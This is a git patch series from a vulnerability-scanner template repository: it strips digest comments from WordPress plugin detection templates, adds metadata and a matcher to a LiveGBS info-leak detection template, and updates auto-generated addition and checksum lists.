\ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 1f8a36ee8f..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207ef43f4927aee19a083ee622e52f91b241a77cad6f27467d42f87be5517767b102201eb5d1c4b2a16e66bcbde0f4c85b98e346677332a80f2b3da645dcea2fcbe5ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 3beaf4b59b..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204d6f8e6ec0f2b8d845168f03d3039a3d9017885a0d16ff69b20fdb233923355b02210099080aa5d0dd7e4bef07c0f3cef14a2ead095c65ab64f4c003f690388bf44fe9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index 579b74ec57..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b526d02171138745fa9a249b24fab6a0a602178510c1434a651d280f43e01be3022005b753a705ab6258f62054b11e25b6b943a3c7668c7af8fb0d0d6081148d22e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index fbb46ab0c6..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220110fcdfb665a69923450e5a5e65c7fc5709b7a83d65afc7cc4442c00ef677642022100a826bf164f36b0a610d45963f90dcd79971eb7e72e2f90724889ef0afba5ccdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 7389914264..f7c9ef9b1f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dcfa521bdf04fd537d23bc73495fa5251de3366fc48490a8f6769b52c88aa4c9022100ac4802ec41a0f78031abb505ae58ff1537ec9f92c151c998be63d1412ccbee3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 70804e6569..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b98ed489e8837e5e8464deb76c04c41816faa0c0639a00b91275e47a0e99ab2c022077ba8dece8d96e936e1b49ea6e026ba4bf49892454d21d374c778a8dcb7f4eb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 0c7677c58a..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204fecb2483d0ded61770f72204b5961ef4ec76e48e97c726bf96ea3c4981c0038022100cea60f16271f5352487176b8956f40eb45c5f85bf5cae35cecb7417b8030ceaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index c05dd7608a..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cc6c29b5e90735e9c3dcc76aabcd364a6568ea608d9f272012032f9504dd2d7c022100b382a1f36280deb5a7bb3eee1cf9a32d9e79cadfd4c4848785ac59276f8d50f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 454a7d45e8..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204adba98fd71fa8a8ff4138ddbb4d66fdc260930ee2a4f3692b56e9c3d2f9db6c0220333ad5cb20f462a863f2f22f19cb1b8e9e3613a2fadcb21782ec70826524209e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 0b989d40cd..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203162e6d507fa2065dceb274fee0c1e88f0f843fc89719a39397c174d35e7f17d022100a212ad0ef0010cdc7f33ddb9b4e9164ac0ac40f5e66cd54647bfebfd12f4787b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index d73768c853..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205f6a0162536a3e13657fda503c3b80751cf9f65b255db71ce21c8abe6e8ccb4c022100b2377418a29e6ec5c6d2ef66b0bb8b816b946d5eb9672d974d9dc50dae73fb9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 5f0ead2179..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022023f81ed547f1b1d4f3438f5b04619134fa17c2ad7a6016ad5ba522bf28b969be02210098d3feeaf4e4badaae082631c262d80a5792e983bdf2d83c49f232f8c36ec82c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index 197d800322..a773829b7d 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022002e939ec037724f644121ee146bd8c2c808249a74a046a0fcd838a96a83f4bc0022100f9b168afefc80090c019c43becd7b17683a0ed729d9f90696d261be4e91a2ce8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index e48c85bc92..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202ef5f989fbbf47e642dc4609cedc589bce5a8ceae2b766d5d962ff0f52e93c890220196f7ff8bb37c6610a8aba44c8b3f53504ec018ad1df5d654dbec8f32efbd0aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 954778c2a5..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dfafc6338373c20d7e5ab64b5e7f0f1e3aa1d2a55f15a2bb14b489c0adcfb9d002206bbf7ed6c17abfb80ad0959f769357e2adc4204846108461ed85df8d84e6a638:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index e02e6336ac..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f6abc19cd8df4ce08106fbf1016000c41152b7a0beb6917ddd97819dc5b2300602210093181b31c61cc26f9d434d22f168ce2965d9dd1b992ad56b5f20a56678f11f7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index f232f0bb91..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204547c8bff7cacd39096f97afce31944247376a4c37dc880c0b97b3a00877eab5022100cc205ad903b8f26e9663d9ab89d37e0e15f783a1fecb129e20cfc29d93762e47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 9074cc2da3..10dad2d2fb 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204e31a620869722a70870c90fc752e45974a58da95cd4143810911a7a89060c43022100f714d49414e6e3fa8f484d0321a373ba9e13dfdc57a1a60c53aca7bffa6f2e9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index a987b10447..e9efe6fb53 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204d38df13848ecb58f993408aa73d520d8b1832ff9c8c07d828b372ed4420a1750220431c66f50af36beb58084c534eba608c1faa4d02d232c0037f9ea60bcf29f3b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 717a3f9aa4..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220018843c375bedeedd4915b0e2181f7d46a3bad04fed0615127dcef77461f341202201eccd9aa408f3aa07e3bc4be49c3e6c33f40b70fd1eab3972ca6925f5fdee736:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 77168a9748..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d1337538afce4b1fd4b3993a1182a97ad787979c01341fd23f81c36c4aa6447702207494ab6f0e754dcc9d68ea1b6ef367eb01e90dd3692ad09c3e615d36eca37299:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 562bf3983e..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022004d443ae9bd05b137b976dd1e2b4e105629d1f61070150c067e02888fcf3a82902207b068f2ed743ea61f1eef920eaae5cbfc8b410dc1e87a60bcb5f7362910b6985:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c2c3bdc66b..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c57a9e3fc9eeb4b84b59f8aa2db36ed7f6bbc490eec7821d323508d8af0b7e8902206cdc41b7b88484af4f5fc7a39608584baa2cd94b2cd809bd37e80c1169653ccd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 900ec51a99..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e72b4b69268c29f91851645b8a63f7df3ecbdd91b44116b6289e6478886371a10220694be601641ca566af8e66ae74fc041ce7c23a1126cbc20a50d0ca72e0231bad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 7642798230..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200c6e51efb1ebccc0ca2cbf22769cf13d33f4be1222e1f420f2b78cf9c7285473022100958ec90360a75ca2d4939e50e2c6fd39aeeb107520cfee02e7f8fde9b3f7e382:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 9c877fe413..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f63b220422281aa417998bf9a706c2278792b8f20297585fc13aaecbaec19bbf02201600ace5c46ad8d3dcd9c6b2fd18d8fe12142e883c7f3472669048d4bfbed9c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 1e64badf4f..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ee1d741c0ab2e026b8ad560c9571be675f3d5fbb6b2ed80efdf1993786bf491e022045f0fd77ec1ac709183f8518efb77fea5c996c9fc309920f65ceda08910ac2e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 980a9806b6..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220425dd8c9bf6a6088907575bf14bb5fed4e8ede50360fbbbcab42932c0fa250670220632114a4a7b23a269b4c62091595998258317f3b4c137d06c39afcb711153729:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 577ed8bf6a..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206543a5bdebeda8bd84963b80de99ab81be0643f63b3da77a3e630e058b68bb8602202e09507c06179c4c16859f9d76931a5ab4eedd617391e1c7871c6dcba89d05e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 3cdbd3d633..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022064cf9eb2b54fef7367a3bc8e9d50287f4375011e1c3b01a116fc3149a84ae439022100bf8d564e5d00e61573815f3332b23296beef879255ad119f0b59a8a5d72c0326:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index e862c03f8d..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f4c84cc3225eac9582d8831a8d4091903cccb2c3e7197898f4b2f0924c34647802204edba487da8ecf0cfe11c924b2594f6e1b8c6cf658d3ceb746acd33789eeeff3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 8899c16b56..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203d486ef639c1bc71171a8fd1488a43176b9f16b96a519b580d42e14c2fa9aa510221008343381e58125686e1e853504f1580765f63cf0e9a8346f8d2c36300b896d0f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 1d36fe89e6..aaaf0f9a17 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207777136befe434cd700898db046b6ca6e8d9619ca795a8e1adfc46f33a29fb97022043e6dadc8cf03dd2240f7166e809719bea2a90f926fdd1a6d0d5d077629fb0ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ef94a1e184..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205ec7a2abfe5b4b8a78d1eae031fef4568b1dea26983056ce5d61697f08f7ff0a0220429f019107a255d7d42fc967be2f50c65b810bff794cdf6fc5c1a433910d1c74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index c027df42b1..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100da55e284cb8a486faac02b60eecf98f03174f43ee27c86e91d3a3680624f2550022100ba7a950a5e701847108a62194660030c9272bd040a37f8efc6e550b0c0c2b4dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 072b2b93f9..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bb4842a52460438ed9eb136e8d4f1ff418c7460e14f09c196e31455106a3ac370221009db350bee1d2646cc23b0d8c5c3b323ce1212126d6d4579e1d40086d6eb229ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From ab95740058974b568b00cfe18547bec32328e6ce Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 21 Jul 2024 13:49:32 +0530 Subject: [PATCH 1467/1841] added header --- http/cnvd/2023/CNVD-2023-72138.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/http/cnvd/2023/CNVD-2023-72138.yaml b/http/cnvd/2023/CNVD-2023-72138.yaml index ac7bc597d5..1ec579e54d 100644 --- a/http/cnvd/2023/CNVD-2023-72138.yaml +++ b/http/cnvd/2023/CNVD-2023-72138.yaml @@ -9,8 +9,10 @@ info: reference: - https://github.com/wy876/POC/blob/main/LiveGBS%E5%AD%98%E5%9C%A8%E9%80%BB%E8%BE%91%E7%BC%BA%E9%99%B7%E6%BC%8F%E6%B4%9E(CNVD-2023-72138).md metadata: + max-request: 1 + verified: true fofa-query: icon_hash="-206100324" - tags: lvs,lfi,misconfig + tags: cnvd,cnvd2023,livegbs,info-leak variables: user: "{{to_lower(rand_base(5))}}" @@ -29,6 +31,11 @@ http: - 'ID' condition: and + - type: word + part: body + words: + - 'application/json' + - type: status status: - 200 From 94edc5975ab92137510b1f2da015e4790863e279 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 21 Jul 2024 13:50:05 +0530 Subject: [PATCH 1468/1841] Update CNVD-2023-72138.yaml --- http/cnvd/2023/CNVD-2023-72138.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cnvd/2023/CNVD-2023-72138.yaml b/http/cnvd/2023/CNVD-2023-72138.yaml index 1ec579e54d..4aa4a900ec 100644 --- a/http/cnvd/2023/CNVD-2023-72138.yaml +++ b/http/cnvd/2023/CNVD-2023-72138.yaml @@ -32,7 +32,7 @@ http: condition: and - type: word - part: body + part: content_type words: - 'application/json' From 68e6ca845c085b956d854fb6c4454b8248554d8c Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 21 Jul 2024 08:23:17 +0000 Subject: [PATCH 1469/1841] Auto Generated New Template Addition List [Sun Jul 21 08:23:17 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b9e9bb2957..99d9c62685 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +http/cnvd/2023/CNVD-2023-72138.yaml http/cves/2022/CVE-2022-45269.yaml http/cves/2023/CVE-2023-29204.yaml http/cves/2023/CVE-2023-4220.yaml From 8c60713d596390173aff9d9f370e0303d6cf72ae Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 21 Jul 2024 08:23:32 +0000 Subject: [PATCH 1470/1841] Auto Generated Templates Checksum [Sun Jul 21 08:23:32 UTC 2024] :robot: --- templates-checksum.txt | 405 +++++++++++++++++++++-------------------- 1 file changed, 203 insertions(+), 202 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 1a21ea3070..8073092849 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -993,6 +993,7 @@ http/cnvd/2022/CNVD-2022-86535.yaml:00d1bf41def187f5b792344c1393ae436a839513 http/cnvd/2023/CNVD-2023-03903.yaml:45257042fc1f34bbce82e67a75121333bad5d6c1 http/cnvd/2023/CNVD-2023-08743.yaml:8c2c0d1a7f369a2570b604f2aa5820f2de976388 http/cnvd/2023/CNVD-2023-12632.yaml:20d2c023ba88ea69568ea70c9619a6f229c9a929 +http/cnvd/2023/CNVD-2023-72138.yaml:4c1e948ea4fa898cb216f0fd2caa0f7cef9cee3b http/cnvd/2023/CNVD-2023-96945.yaml:af381634d92b6ad37814da12d2f652c60614fe75 http/cnvd/2023/CNVD-C-2023-76801.yaml:7a741a8fbfcf92c4df98e64eada67899895d8078 http/cnvd/2024/CNVD-2024-15077.yaml:d97b1860e5154481146b5ebaf48f57448f62ecd1 @@ -4691,7 +4692,7 @@ http/exposed-panels/tikiwiki-cms.yaml:d91b81e5563c5ba7d2250b12f8f212123f011e90 http/exposed-panels/tiny-file-manager.yaml:a2b82b2bbaced8296bdf096ca1d4572118f78eb5 http/exposed-panels/tiny-rss-panel.yaml:8f1a227e6817acfd26dfc58649ba4ba519afc061 http/exposed-panels/tixeo-panel.yaml:3d3add11d1b9ff423817bf2edaf47a692049b3e1 -http/exposed-panels/tomcat/tomcat-exposed.yaml:cd058476df524c6c30933ec604eb22c339457b8c +http/exposed-panels/tomcat/tomcat-exposed.yaml:25a270f926681767a6adf62af9f8bca33e21619d http/exposed-panels/tooljet-panel.yaml:25787d33b29529884c9002fafede329a5f53111e http/exposed-panels/total-web-solutions-panel.yaml:c792bfbfed0cfe6971fecf0aa42d4fb417b3d49a http/exposed-panels/totemomail-panel.yaml:a1f46a2540203c5c3093a82282bb98164bb1bf8b @@ -7305,229 +7306,229 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:d136222c7099ff301606b82ffc7de42d04ee6a87 -http/technologies/wordpress/plugins/add-to-any.yaml:a97973b1c5ed79ee2fcd47a4bd551c141f349fe0 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:1e047592047f4c95f4411eeeabdc70eaae90ceba +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:c21fed774394def20cb662dcffc9b175f7825fd8 -http/technologies/wordpress/plugins/akismet.yaml:74a2856e85e5537356efccd356385c859e878ed9 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b 